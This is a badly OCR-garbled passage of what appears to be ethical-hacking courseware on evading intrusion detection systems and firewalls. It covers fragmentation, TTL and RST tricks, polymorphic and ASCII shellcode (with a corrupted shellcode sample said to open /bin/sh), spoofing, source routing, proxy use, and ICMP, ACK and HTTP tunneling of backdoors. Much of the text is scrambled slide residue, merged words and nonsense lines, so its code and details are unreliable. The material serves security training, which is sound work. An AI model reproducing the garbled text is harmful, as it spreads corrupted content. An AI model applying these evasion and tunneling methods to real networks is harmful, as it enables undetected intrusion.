reassemblefragmentsat the IDSand
successfully
performs a fragmentation attackon a hostwhenthe NIDSfragmentation
reassembly
timeout exceedsthevictim'sfragmentationreassembly
timeout.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Overlapping
Fragments
Forexpe tel rpmentconti of100byte ofpond with sequence umber; thesecond agent com
of
SernOS
i origina
with
whesven
een
ae the
tate h esubsequentWindows
agment
fapment oi e fg
set
leo
eg,
05)
W2K#/2003]
and some operating

a o
&

Overlapping
Fragments
Attackersuse overlapping
fragments
to evadeIDS.In this technique,
attackersgenerate a series
of tinyfragments
with overlapping
TCPsequence numbers.For example, the initial fragment
consistsof 100bytes
of payload
with the sequence numberof 1,thesecondfragment includes
an overlapping
sequence of 96 bytes,
and so on. At the time of reassembling
the packet,
the
destination
hostmust knowhow to assemble TCPfragments.
theoverlapping SomeOSwill take
the original
fragments with a given offset(e.g.,
WindowsW2K/XP/2003) and some OSwill take
the subsequentfragments witha givenoffset(e.g., Cisco105).
Considera scenario in which theattackercarries out thisattackbybreaking
thepacketinto four

& a
re

12.36Evading
Figure Overlapping
0S using Fragments

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Time-To-LiveAttacks
(©These
atacksrequie
Tisinformtioncanbeobtained
betweenthe atacker
toa
the attacker have prior
usingtools
andthevim
knowledge
ofthetopology
ofthe
vtim's
of
s uch traceroutewhichg iveinformation
network
onthenamber routers

T heatacer sendsragwitha
gh
TT anda

Time-To-LiveAttacks
EachIPpacket
can takebefore a
has field calledTimeto Live(TTL),
a network nodediscards
by1. Whenthe TTLreaches0,the packet
it. Each
whichindicateshow many hops
router along
is dropped,
a datapathdecrements
the packet
this
value
and an ICMPalert notificationis sent to
the sender. Typically,
whena host sends a packet, it setstheTTLto a high valuesuchthat it can
reach its destinationundernormalcircumstances.DifferentOSuse different default initial
valuesfor the TTL. Therefore,attackerscan guessthe numberof routers betweenthemand a
sending machine, andmakeassumptions as to whatthe initialTTLwas, thereby guessing which
0S a hostis running,as a prelude to an attack.To prevent suchdetection, SmartDefense can
change the TTLfieldof all packets(orall outgoingpackets) to a givennumber.Theseattacks
require the attackerto have prior knowledge of the topology of the victim'snetwork.This
Information can be obtained usingtools suchas traceroute,whichgivesinformation o n the
numberof routers betweenthe attackerandthe victim.
Considera scenario i n whicha router is present betweenthe IDSand a victim. Attackersneed
to acquirethis informationbeforelaunching the TTLattack bybreaking the maliciousdata
packet into three fragments. It is assumed that the attackerhasprior knowledge about the
topology of the targetnetwork(i.e.,how manyrouters are there betweenthe attackerand
victim machines). Theattackerfragments the packet andsendsfrag1 with the TTL set to a
higher
value. by
a falsepayload attacker
sends
It is then received the victim andthe IDS.Then,
anda TTLvalueof 1,whichis receivedbythe IDS;
receive it, because the router discards
the
however,
it andthe TTLvalueis reduced
frag-2'with
the victim will not
to 0. Next,the attacker
sendsfrag-3
TTL
value,
with a correct payload
andthe victim. Afterreceivingfrag-3,
and a higher
the IDSperforms
whichenablesit to reachthe IDS
a TCPreassembly on fragments 1,2’,
and3,andthe
victim
frag-2.
waits for
victim, afterreceivingfrag-2,
Finally,
reassembles
the attackersendsfrag-2
fragments
with a validpayload.
1, 2, and3 andgetsthe attackcode
The

ical andCountermensores
Mackin ©by E-Comel
Copyright
 payload.
embeddedi n a malicious Here,the IDShasonlyfrag-2, reassembled
as it hasalready
the fragments
andthe stream hascleared,

[—)
‘attacker

Fragdropped
at router

ComectResserbiy

Evading
12:39;
Figure Time-To-veattack
10Susing

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Invalid RSTPackets

ecg agina T P header

a
terror Thereset (AST)
© eggs
oftheheader
reson
anddata dose TCP connection
is usedto

packet
AST tothe 0S wth aniva checksum e ‘butthattheTCPcommunication
system
will the
receive packet
the target
sesion hasended

and drops
checksum @
‘The
attacke nables
Saunas
to
theattackerscommunist

Invalid RSTPackets
TheTCPuses 16-bitchecksums for error checking of the headerand dataand to ensure that
communication is reliable.
It addsa checksum to everytransmittedsegment that is checked at
the receivingend.Whena checksum differsfromthechecksum expected bythe receivinghost,
the TCPdropsthe packet at thereceiver's end.TheTCPalsouses an RSTpacket to endtwo-way
communications.Attackerscan use thisfeatureto eludedetectionbysending RSTpackets with
an invalidchecksum,whichcauses the IDSto stopprocessing the stream because the IDSthinks
that the communication sessionhasended.However, the endhostchecksthis packet, verifies
‘the
checksum value,andthen drops the packet if it is invalid.
SomeIDSmight interpretthis packet
as an actual
termination ofthe communication andstop
reassemblingthe communication. Suchinstancesallowattackersto continue to communicate

packet the
with the endhostwhile confusingIDSbecause theendhostacceptsthepackets that follow
the RST with an invalidchecksumvalue.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Urgency
Flag
BB
tre erentunerfaginthe hese
TcP i s usedto markthe
datathatrequiresweetprocessing
ttherecevingend

fl 6B a ae
eR fat Cr te ar poe

“Threats
inthe
1S andthetarget
yters havingerent
sets ofpackets,
whichan beexpe
by
tach

FlagAttack Example
‘Urgency

Urgency
Flag
Theurgency flagi n the TCPmarksdata as urgent.TCPuses a n urgency pointerthat pointsto
the beginning of urgentdatawithina packet. Whenthe user sets the urgencyflag, the TCP
ignoresall databeforethe urgencypointer, andthe datato whichthe urgencypointerpointsis
processed. if the URGflag is set,the TCPsetsthe UrgentPointerfieldto a 16-bit offsetvalue
that pointsto the lastbyteof urgentdata in the segment.SomeIDSdo not considerthe TCP’s
Urgencyfeatureand process all the packetsi n the traffic,
whereasthe target systemprocesses
onlythe urgentdata.Attackersexploit this featureto evadethe IDS, as seen in other evasion
techniques.Attackerscan place garbagedata

the IDS have more datathan the end host processes.

before
the urgencydata.Thepointerandthe IDS
readthat datawithoutconsiderationof the endhost'surgencyflaghandling, Thismeans that
Thisresultsi n the IDSandthe target
systems havingdifferentsetsof packets,whichcan beexploited byattackers to passthe attack
traffic
Example:
a TCP packet contains
“When both urgent data and normal data then 1-
byte dataafter the urgent data is lost―
Packet 1: XYZ
Packet 2: LMN UrgencyPointer: 3
Packet 3: POR
End result: XYZLMNOR
aboveexample
‘The the working
demonstrates of an urgencyflag
i n a TCPpacket.
According to
REC1122,if a TCPsegment consistsof an urgencypointer,then one byteof dataafter the
Urgentdatawill belost.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Shellcode
Polymorphic
©
izes
‘wth
sess
and
portnson
incoming outgoing
detonate
datapaclats
anby
mating
(0S dees ck tac sates

‘Many
IDSsidentity fr thecommonly
s ignatures use strings
embeded in the
shlcode

shelicode
Polmorphie attacks
iclde multiple iit
making
signatures, to detecthesignature

aches the payload

encode
abefore
andthe placedecoder
certain techniques
using thepayoud

‘As is completely
aesut of his the shelcode ewiten eachtime its sent,ths detection
evading

evades
shelcode
strings,
ato
‘Thistectnique thecommonly
used shllcode
thus making u nusable
s gnatres

Shellcode
Polymorphic
A signature-based networkintrusion detectionsystem (NIDS)
identifiesan attackbymatching
attacksignatures with incomingandoutgoing datapackets. ManyIDSidentify for
signatures
commonly used stringsembeddedin the shellcode.Polymorphic shellcodeattacksinclude
multiplesignatures,making it difficultto detect the signature.
Attackers encodethe payload
Usingsome technique andthen place a decoderbeforethe payload. Asa result,theshellcodei s
completelyrewritten eachtime it is sent,thereby evadingdetection.
Withpolymorphic shellcodes, attackershidetheir shellcode (attack code)byencrypting it with
an unknownencryption algorithm and including the decryption code as partof the attack
packet.To carryout polymorphic shellcode attacks,theyusean existingbuffer-overflowexploit
and set the “return―
memory addresso n the overflowedstackto the entrance pointof the
decryptioncode. Thismakes i t difficultfor the IDSto identify
it as a shellcode.
Therefore, when
attackersmodify/transform
their attacksin this way, the NIDScannot recognizethem.This
alsoevadescommonly
technique thus making
usedshellcodestrings, shellcodesignatures
unusable.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ASCIIShellcode

Thstimitation
Instructions
forconverting to ASClvalues ||Pa
canbe overcome bywngothersetsof
propery
“andrwnbrictrsShtpetwndamtsPnatakst0
i

ASCIIShellcode
shellcodescontain onlycharacters
‘ASCII fromthe ASCIIstandard.Suchshellcodes allow
attackersto bypass
commonly enforcedcharacterrestrictions within the stringinputcode.
Theyalsohelpattackersbypass IDSpatternmatching signatures becausetheyhide strings
to polymorphic
similarly shellcodes.The IDSpatternmatching mechanism does not work
efficiently
Using
with
ASCII
values.
ASCIIfor shellcodeis very restrictive in that it limitswhat theshellcodec an do under
some circumstances,as not all assembly instructions convert directly
into ASCII values.This
restriction bypasses
usingotherinstructions,or a combinationof instructions,
whichconvert to
ASCIIcharacterrepresentation,
serving the same purpose as those instructions that convert
improper.
AnASCIIshellcodeexample
is givenbelow:
char shellcode[] =

"
LLLLYhbOpLXSbOpLHSSPPWQPPaPWSUTERDJENStDS|
a
YXODka0TkafhN9fYf1LkbOTK
"DksOtkw3
fYOLKEOTKgEA'
|
r£Y£1LKiOtkkh9Sh8Y1LkmjpYOLKkq0tkrh2wnuX1
£XODKkxOtkxOtkyCjn¥OLkzCOTk2CCjtxO"
kz COtkzC}
3XODKzOTKECOtKzChjG3IY1LKZCCCCO
k2ChpfcMX1Dk2CCCCOtkzCh4pCnY1Lkz1Tk2CCCC’
3a
HIGEXE1Dkz#1 tkzCCjHXODKZCCCC}VYOLKZCCC
"XODk2COTK2CJWXODK2OTK2C}AXODKZC}XYOLKZOtK―
"

gMdgvvn9F1r
Whenexecuted,
FS Sh@pG9wnuvjrN£rVx2LGkG3IDp£"
"cM2KgnnJGgbinYshdvb9d"
the shellcodeaboveruns a"/bin/sh" shell.“bin―
and “sh―
are contained
in the lastfewbytes
ofthe shellcode.
Module1 26 ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacks
Application-Layer
\©Apoiations a cesing melas (ai, vdeo nd compressh em toa smaller ste
images) for maiming
thedaa transferate

The10Scant very thesignatre

ofthecompressed
fle format

‘The
cramp,
various
10Scan
are
integer overflow
cantons favorable
recognize
values
forattack,butalternativeforme
can beuredto explointeger
ofatack azoposible,
vulnerabilities
for

Attacks
Kpplication-Layer
Mediafilessuchas images, audios,
andvideoscan be compressed
so that they
can be rapidly
transferreda s smallerchunks.
Attackersfindflawsi n this compresseddata and perform
attacks; cannot identify
even the IDSsignatures the attackcodewithindatathuscompressed
Manyapplications
that deal with suchmediafiles employ
s ome form of compression to
increase the datatransfer speed.
Whenyou finda flawin theseapplications,
the entire attack
can occur within the compressed
data,andthe IDSwill haveno way to checkthe compressed
This enablesan attackerto exploit
file formatfor signatures. the vulnerabilities
in the
compressed data.ManyIDSlookfor specific
conditionsthat allowfor an attack.However,
there
are times whentheattackcan takemanydifferentforms.Forexample, can exploit
attackers
the integeroverflowvulnerabilitiesusingseveraldifferent integervalues.Thisfact,combined
with compressed data,
makessignature detection
extremely difficult.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Desynchronization
Pre-ConnectionSYN Post-Connection SYN

Intl SYN
beforetherealc onnection fromte atu numbers thatthekere
sequence honoring
estas
nthe
butwth an vals TP stackersendapst connection SYNpacha ata stream,

Ura
pace
isecmved
st

block
Centro
e

target
cr anaes he I
opened
atch that ofthenewly
thi
oferta

esabised
connection
ess

received
SYN
owever, the
‘eferects
Thetet ofthis
hostw ilgnare

attack
ito
SYN packet,
sit

getheOS 0 reymehronse
ts

‘ezynchranie
the 10S anew
completly vad sequence
n umber be
Steam,b ecause awatng ferent sequence
number

0S an
ST
: son :
ie stopsatacers
send packet
andstackate
legtimate
wth
the frommotoringal
thusclse te naton ofthe
he
conection
sequenceumber
a nd

Desynchronization
Pre-Connection
SYN.
This attack isperformed by sendingan initial SYN before the real connection is
established,butwithan invalidTCPchecksum,
SYNsi n a connection. if a SYNpacket
the IDSresets the appropriate
TheIDScan ignoreor
is receivedafterthe TCP
sequencenumberto matchthe newly
accept
subsequent
controlblockis opened,
received
SYN
packet.
AttackerssendfakeSYNpackets
with a completely
invalidsequence numbert o.
desynchronize all legitimate
the IDS.Thisstopsthe IDSfrommonitoring andattack
traffic. If the IDSis smart,it does not checkthe TCPchecksum. If the IDSchecksthe
checksum, theattackis synchronizedanda bogus sequence number i s sent to the IDS
beforethe realconnection occurs.
Post-Connection
SYN
In this technique,
attackersattempt
to desynchronize the IDSfromthe actualsequence
numbersthat the kernelis honoring. Senda post-connection SYNpacket in the data
stream,which will have divergent sequencenumbersbut otherwisemeet all the
necessary criteria to be accepted bythe targethost. However,the targethost will
ignorethisSYNpacket, as it referencesa n already establishedconnection. Thisattack
intendsto getthe IDSto resynchronize its notion of the sequence numbersto the new
SYNpacket. It will then ignore any datathat is a legitimate partof the original stream
becauseit will be waitingfor a differentsequencenumber.Onceyou succeedin
resynchronizing the IDSwith a SYNpacket, senda n RSTpacket with the new sequence
number andclosedownits notion oftheconnection.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OtherTypes
of Evasion

Encryption established encrypted

(©Whentheattackerhasalready an session
‘with
thevei, i t results
nthe mosteffective
evasion attack

and loads
(© Theatackersends of unnecessary trafficto produce
noise,
Flooding ifthe IDSdoesnot analyze
the noise tafe wel thenthe tr
attacktrafficmaygoundetected

Other Types
of Evasion
=
Encryption
intrusion detectionanalyzes
Network-based traffic i n the networkfrom the source to
thedestination.
Ifan attacker
succeedsi n establishing sessionwithhis/her
an encrypted
targethost usinga secure shell (SSH), secure socketlayer(SSL),
or virtual private
network (VPN) tunnel,the IDSwill not analyze the packetsgoing through these
encrypted communications. Thus,
an attackersendsmalicioustraffic using suchsecure
channels,thereby evading
IDSsecurity.
Flooding
IDSuse resources suchas memory and processor speed to analyze the traffic going
through
them,To bypass attackersflood IDSresources with noise or fake
IDS security,
traffic to exhaustthem with having to analyze flooded traffic. Oncesuchattacks
succeed, attackerssendmalicious traffictowardthe target systembehindthe IDS,which
offerslittle or no intervention. Thus,true attacktrafficmightgo undetected

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Firewalls
Evading
The previoussection explained howattackers
use various techniques to bypass IDS.Similarly,
theycan alsouse various tricksand techniques
to bypass firewalls.Thissection discusses
the
different usedbyattackers
techniques to bypass
firewallsecurity.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FirewallEvasionTechniques
Using
an Adres in StHandONSTunnating

BannerGrabbing
«Prony
Using Server
systems

UPAdress
Spoofing JemTunneling MITMAttack
“Trough

Tunneling
‘Ack ‘Trough
Content

‘Tiny
Fragments HTTPTumeling ‘Through
x85Attack

Firewall EvasionTechniques
Bypassing a firewall is a technique
wherebyan attackermanipulates the attacksequence to
avoidbeing detectedbythe underlying firewall.Thefirewalloperates
security on a predefined
set of rules,and with thorough and skill,an attackercan bypass
knowledge the firewall by
‘employing
various
firewall
bypassing
techniques.
Using the
firewallinto not filteringattacker
techniques,
the malicioustrafficgenerated
these
bytheattacker
tricksthe

Somefirewallbypassing
techniques
are as follows:
+
Port Scanning ICMPTunneling
+
Firewalking ACKTunneling.
+

BannerGrabbing
IPAddressSpoofing
HTTPTunneling,
SSHTunneling
SourceRouting
TinyFragments
DNSTunneling
Through ExternalSystems

an in of
Using IP Address Place aURL
Using WebsiteSurfing
Anonymous Sites
Through
MITM Attack
‘Through
Content
UsingProxy
a Server Through
XSSAttack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FirewallIdentification

Port Scanning
Firewalking Banner Grabbing

Firewall Identification
Port Scanning
Ports arepointsfrom which computers send or acceptinformationfrom network
resources. Portscanning identify
i s usedto openportsandtheservices runningon these
ports.Finding
open portsis an attacker'sfirst steptowardgaining access to the target
system.To do so, the attackersystematically scans the target's
portsto identify the
versions of services, whichhelps
i n finding
vulnerabilitiesi n theseservices. Attackers
utilitiesto do so, manyof whichare
sometimes use automatedport-scanning easily
available.
How AttackersScanPorts

sending
Port scanningconsists of messages to eachport, one at a time. The kind of
responsereceivedindicateswhetherthe systemis usingthe port,leavingit exposedto
the discovery
of weaknesses. Some firewallswill uniquely identify
themselvesusing
simpleportscans.Forexample, CheckPoint'sFireWall-1listenson TCPports256,257,
258,and259,andMicrosoft'sProxyServer usuallylistenson TCPports1080 and1745.
Firewalking
Firewalking is a method of collecting information about remote networksbehind
firewalls.It is a technique that uses TTLvaluesto determinegateway ACLfiltersand
mapnetworksbyanalyzing the IP packet response.It probes ACLson packet filtering
routers/firewalls using the same methodas tracerouting. Firewalkinginvolvessending
TCPor UDPpackets into the firewallwheretheTTLvalueis one hopgreater than the
targeted firewall.f the packet makesit throughthe gateway, the system forwardsit to
the next hop, wherethe TTL equals one, andprompts a n ICMPerror message at the

ical andCountermensores
Mackin ©by E-Comel
Copyright
pointof rejection Thismethodhelps
with a "TTLexceededi n transit"message. locatea
additionalprobing
firewall; facilitatesfingerprinting
andidentificationof vulnerabilities.
Firewalkis a well-knownapplication used for firewalking.
It hastwo phases: a network
discovery phase and a scanningphase. It comes with various open-sourceLinux
distributions.Nmap hasa firewalkscriptthat can beusedto perform firewalking.
Banner
Grabbing
Bannersare service announcements provided byservices i n responseto connection
requests,andthey
methodof fingerprinting that helpsversion grabbing
often carry vendor information.Banner
i n detecting
is a simple
the vendor of a firewalland the
firmwareversion. It identifiesthe service running o n the system. Attackersuse banner
grabbingto fingerprint services andthusdiscover theservices runningon firewalls.The
threeprimary services thatsendout bannersa re FTP,Telnet,andwebservers.
A firewall does not block banner grabbing
becausethe connection betweenthe
attacker'ssystemand the targetsystemappearslegitimate. An example of SMTP
banner
grabbing
Thesyntaxis
is telnet

“<service
mail.targetcompany.org
name > <service
25.

running > <port number>―

Bannergrabbing is usedfor specifying bannersand applicationinformation. For
example,
whenthe user opens a telnet connection to @knownporton the target
server

afew
andpressesEnter times,
C:\>telnet www.corleone.com
ifrequired,
80
the result:
it displaysfollowing

HTTP/1.0 400 Bad Request

Server: Netscape Conmerce/1.12
-

Thissystem workswith many othercommon applications that respond to a set port.The

informationgenerated throughbannergrabbing can boost the attacker's effortsto
further compromise the system. Withinformationaboutthe version andthe vendorof
thewebserver, the attackercan furtherfocuson employing platform-specificexploit
techniques.Services o n portssuchas FTP,Telnet,andweb servers shouldnot remain
asthey
‘open, a re vulnerableto bannergrabbing,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IP AddressSpoofing

IPaddress

hisfher
spoofing
identity
spoof asacess
i hijacking

website,
hijack
browsers,
gain
Itcan beusedto a
i n which an
technique atackermasquerades
r
trusted hostt o conceal
unauthorized toa network

modify
_tacers

the to
‘order bite
theaddressing
bypass firewall
information
intheIPpacket
header
andthe source addres il in

ost
Cy
ofthe
molouspacets
Amasqurads
dress
as

he
ost medyingh e?
that ners

IP AddressSpoofing
Mostfirewallsfilter packets
basedon the source IPaddress. Thesefirewallsexamine the source
IP addressanddeterminewhetherthe packet is comingfrom a legitimate source or an
illegitimate
source. The IDSfilters packets from illegitimate
sources. Attackersuse the IP
spoofingtechnique
IPaddress spoofing
such
to bypass firewalls.
is a hijackingtechniquein which an attackermasquerades as a trustedhost
to concealhis identity, spoofa website, hijack browsers, or gain unauthorized access to a
network.In IP spoofing, creates IP packets
the attacker byusinga forged IPaddressandgains
access to the system or networkwithout authorization.Attackersmodify the addressing
information i n the IP packet header andthesource address bitsfieldto bypass
thefirewall.The
attackerspoofs the message;therefore, the destinationhostthinksthat it hascome from a
reliable source. Thus,the attackersucceeds i n impersonating otherswith the helpof IP
spoofing. Hackersu se this technique to avoiddetectionduring spammingand various other
activities.
Forexample, let us
‘Amasquerades consider
A, C.
threehosts: B,and HostCisa trustedmachine
as hostCbymodifying
sendto host8. When thepackets of
the IPaddressthe maliciouspackets
hostB thinksthatthey
are received,
Host
that it intendsto
a re fromhostC,but they
ofhost
8.
are actually
fromhost
A.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Host8
DestinationAddress
10.0.0.1

Source
Address:
10.0.0.2
|" .

10.0.0.2 .

HostC:Trusted
Machine

12.40:Evading
Figure
IP
Firewal Spoting
using Address

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SourceRouting
©.Source
packs
l ows the sender
routing
thenetwork
of specttheroutethepacket
to partly or completely ake through

thetravels
chooses the network,
(©As packet
router
examines
thenexthop
(©nsource routing,
I
trough nodesinthe
to eect the packet

thesender makes
each
tothe destination
some or alof thesedecisions
the destination ade

on therouter
and

The
gre shows

SourceRouting
Usingthistechnique,the senderof the packetdesignates the route (partially
or entirely)
that a
packet shouldtakethrough the networksuchthatthe designated route shouldbypass the
firewallnode.Thus,
theattackerc an evadefirewallrestrictions.
Whenthesepackets travelthrough the networknodes, eachrouter examines the destinationIP

sendermakessome the
addressandchooses next hopto directthe packet destination.
or allof thesedecisions
o n the router. to
the the
In source routing,

Source routing
is categorized
into two approaches:
loosesource routing
and strict source
routing.In loosesource routing,the senderspecifies one or more stages that the packetmust
go through, whereasi n strict source routing,the senderspecifiesthe exact route the packet
must go through
figure
‘The belowshowssource routing,
wherethe originator
dictatestheeventualroute of the
traffic,

dingFra using Routing

Source

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TinyFragments

TinyFragments
Attackerscreate tinyfragments of outgoingpackets,forcing
s ome of the TCPpacket's header
information into thenextfragment. TheIDSfilterrulesthatspecifypatternswill not matchwith
the fragmented packetsowing to the brokenheaderinformation.Theattackwill succeed if the
filtering
router examines onlythe first fragment andallowsall the other fragments to pass
through. Thisattackis usedto avoiduser-definedfilteringrules and workswhenthe firewall
checks onlyfor theTCPheaderinformation.
‘.3ar0u1080« it, Offset=0
Fragment
Source
Port Destination
Port
Number
Sequence

[Acknowledgement
Sequence
Reserved
Dataotter 1
Number
Window

Checksum UrgentPointer=o

header Figure
12.42:TCP format

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BlockedSitesUsing
Bypass a n IPAddressin Placeof a URL

Thismethod
blocked
website's
domain
ying the I address
involve
name
directintothebrowse’
address
ba
i ofple ying the

© ve ser: Hato te asthe ake web

@
a
"eet ste Dog stare vas
te abe seve we seer

BlockedSitesUsing
Bypass an
IP
Thismethodinvolvestyping blockedwebsite’s
a
Addressin Placeof URL
directly
IPaddress
a
i n the browser's
addressbar
insteadofthe domainname. Forexample, to accessFacebook, typeits IP address insteadof
typingits domainname. Useservices suchas Host2ip
to find the IP addressof the blocked

fails software
Thismethod ifthe blocking
‘website.
trackssent
tothe
web the IP address server.

, . =—

12.4: Bypass
Figure
sites
blocked
using ofthe
theIPadressinstead URL

Module2 1557
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 BlockedSitesUsing
Bypass WebsiteSurfing
Anonymous Sites

ntine
websites
18.Some
that
enable
{©Thereare many

options on
eneryptthe
provide
the
anonymiter

to
services

URES
surfing
anonymous
ofthe websites
internet

hide
|G.These
the
actual
Paddress
ofthe
services
surfer
enable
bypassing
the and IP-based
firewall

‘Anonymizers
EDex:s0
ononmtercom
Eh reeimnnorortecom

‘nto fre prosycom npd/onemymosseors

doomgro
-ntos:/fononmoue-ponyserverset

ioe fodrog.comt
tp//

tpn? anyoecom
com)

spp
eps/fronycom pf ame

BlockedSitesUsing
Bypass WebsiteSurfing
Anonymous Sites
Anonymous web-surfing sites helpto browsethe Internet anonymously and unblockblocked
sites (ie., evadefirewallrestrictions). Byusing thesesites,you can surfrestrictedsites
anonymously without revealing your IP address.Various anonymousweb-surfing sites
available,some of which provide optionsto encryptwebsiteURLs.
Thefollowing is the list of proxyservers that can help
you to accessblockedwebsites.These
proxy websiteswill hide the actualIP addressand showanother IP address, whichcould
preventthe websitefrombeing blocked,thereby allowing
access.

‘Anonymizer
Source:https://www.ononymizer.com
‘Anonymizer’s
VPNroutes all the traffic through tunnel directly
an encrypted fromyour laptop
to secure andhardenservers and networks.It then masksthe realIP addressto ensure
complete
andcontinuous anonymity
for al onlineactivities.
Someonlineanonymizers
include:
=
https://www
free-proxy.com http://anonymouse.org
=
https://anonymous-proxy- https://www.boomproxy.com
servers.net
hittp://ww7.anype.com
ttps://zendproxy.com hnttps://wwwspysurfing.com
ttpsi//proxify.com
nttp://www.guardster.com

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Bypass
a Firewall Using
a Proxy
Server

InghePot box tae the

port pony
number
that usedb ythe server for cen connctons
fy deta, 8080)
‘ict slot Bypae
for
proxyserver localarene check oe you donot want te pry server compe abe

Bypass
a Firewall Using
a Proxy
Server
to befollowed
Steps a firewallusinga proxyserver:
to bypass
1. Finda n appropriate
proxy server
2. Inthe Toolsmenu
Propertiesdialog of
any Internet browser,
boxunderConnections
Settings,―
go to “Proxy
tab,click"LANsettings―
and i n the Internet

UnderLANSettings, clickon the“Usea proxyserver for your LAN"checkbox

In theAddressbox, typethe IPaddressof the proxy server
In the Port box,typethe portnumberthat is used bythe proxy server for client
connections(bydefault, 8080)
Clickto selectthe “Bypassproxy server for localaddresses―checkboxif you do not
want to be usedwhenconnected
the proxyserver computer on the local
to a computer
network
ClickOKto closetheLANSettings
dialog
box
dialog
ClickOK againto closethe Internet Properties box

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsthrough
Bypassing the ICMPTunneling
Method

"STportions
ands
rot
xinefhe nybenthe
prin bir
parton byt irewals,us cn etd peed

Firewalls through
Bypassing the ICMP Tunneling
Method
TheICMPprotocol is usedto sendan
networkcommunication,
not entail a significant
error
message
users oftenenable
to the client.As it is a required
this service on theirnetworks.
threatfromthe security
perspective.
service for
Moreover,
Theattackertakesadvantage
it does
of the
enabled ICMPprotocol
ICMP
tunneling
on the networkandperforms
data into the targetnetwork.The ICMPtunnel provides
networks.
to sendhis/her malicious
attackerswith full access to target

It allowstunnelingof a backdoor shelli n the dataportionof ICMPEcho packets.RFC792,which

delineatesICMPoperation, doesnot definewhat shouldgo i n the data portion.Thepayload
portionis arbitrary
andis not examined bymost firewalls.Thus,anydatacan beinsertedin the
payload portionof the ICMPpacket, including @ backdoorapplication. Someadministrators
keep ICMP open on their firewall because it is usefulfor tools suchas ping and traceroute.
Assuming that ICMP is allowed througha firewall, use Loki ICMP tunneling
(https://tools.cisco.com)
to execute commands of choicebytunneling theminsidethe payload
of ICMP
echo packets.

<
Unwrapc ommand erste
Tocawrapsouta i m AP
Ficewall "Echo
Pucheta ndreends Internet Cent

12:4;
Figure
Bypassing
frewal
ICMP through tunneling

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsthrough
Bypassing theACKTunneling
Method

Ac allows
tunneling a backdoor
tunneling withTP packets
application withtheACKbitset
(©
T h eAck

Some
isuse to acknowledge
firewallsdonotcheck
tate
response to leptimate
packets
ofa
the receipt
packet
areto
be
withtheACKbitset because
ROKbts supposed usedi n

(©Toots
such
ae Ackomd canbeweed
hetp:/ntsecuniy.n) to implement
ACKtunnting

i= §_.&
Firewalls through
Bypassing theACK Tunneling
method
Ordinary
packet
filtering
firewallsdefinetheir rule setsbasedo n theSYNpacket
whenTCPlevel
communication is to beestablished. sucha firewalla ssumesthat onlythe SYN
Thisis because
packet
is comingfromthe clientandis thuslikely codein the SYNpacket.
to contain malicious
Thesefirewallsignorethepossibility
thatthe attacker
can alsoinjectmalicious
codei n the ACK
packet. AsACKpackets are sent after establishing
a session,ACKtrafficis consideredlegitimate
the filtering
In addition, of ACKpackets is ignored
to reducethe workloadof firewalls, as there
can be manyACKpackets for one SYNpacket. ACKtunneling allowstunneling of a backdoor
applicationwith TCP packets with the ACKbit set. TheACKbit acknowledges the receiptof a
packet, Asstatedearlier, some firewallsdo not checkpackets with the ACKbit set,because ACK
bitsare supposed to be usedi n responseto legitimatetrafficthat hasalready beenallowedto
pass through. Attackers exploitthis fact i n ACK tunneling, Tools such as AckCmd
(http://ntsecurity.nu)
use ACKtunneling,

‘Internetclient

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewallsthrough
Bypassing the HTTPTunneling
Method
HTP Tuoeling allowsattackers
technology
o various
perform internett asks
d espitetherestcons imposed

This
m ethod
a
the targetcompanyhas publiw eb server, withpor 80used
canbe implemented for

Whydo I Need HTTPTunneling?

| nstance,
For
from
all
ports
8and
cansider
thatan organizationsreal restrictusers accessing except

HTTP
wil
enable
the
©.
use
of HTTP
tunneling FTP
via the protocol

¢

°c

Module2 1562
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 Tools
HTTPTunneling

1 sow
irPe
rots
Yow
pronyou
|| it
yuto HTTP whchiabodtig om Atwo-wey tna omen
tn
comptes

2-3 ga

Firewalls through
Bypassing the HTTP Tunneling
Method
HTTPtunneling allowsattackersto perform various Internet tasksdespite the restrictions
imposed byfirewalls.Thismethodcan beimplemented if thetargetcompanyhasa public web
server in whichport80 is usedfor HTTPtraffic that is unfilteredbyits firewall.Theattacker
encapsulates data insideHTTPtraffic(viaport80).Many
of an HTTPpacket
port80,
to confirmthat it is legitimate.
firewallsdo not examine payload
Thus,i t is possible
to tunneltrafficvia TCP the
Toolssuchas HTTPTunnel (http://http-tunnel-sourceforge.net)
use thistechnique of tunneling
trafficacross TCPport80.HTTPTunnel is a client/server
application,
theclientapplicationis htc,
andthe server is hts.Uploadthe server to thetargetsystemand redirectit through TCPport

= :+ D>‘Ha >

Figure
12.46:
BELPER
firewall
Bypassing troughHTTP
tunneling

Why
HTTP
HTTP
Tunneling? granted
doI Need
tunneling is usedi n scenarios in whichnetworkusers are restrictedconnectivity
a firewall or proxy; in suchconditions,
through some applications
may also lack native
communications support.

Module2 Page1562 ical andCountermensores

Mackin
©
Copyright
by E-Comel
‘These
restrictions include:
Blocking of TCP/IP ports,traffic initiated from outsidethe network,and network
exceptfor a few commonly
protocols usedprotocols,etc.

Surfing
blocked
websites
Posting
in forumsanonymously

Using application chatting

a n such as
by
hiding
theIPaddress
throughICQor IRC,instant messengers,games,
browsers,etc.
=
Sharing
ofconfidential
resourcesover HTTP securely
Downloadingfileswith filteredextensionsand/or
with maliciouscode
Forinstance,
considerthat organization
firewallsrestrict users to access all portsexcept80and
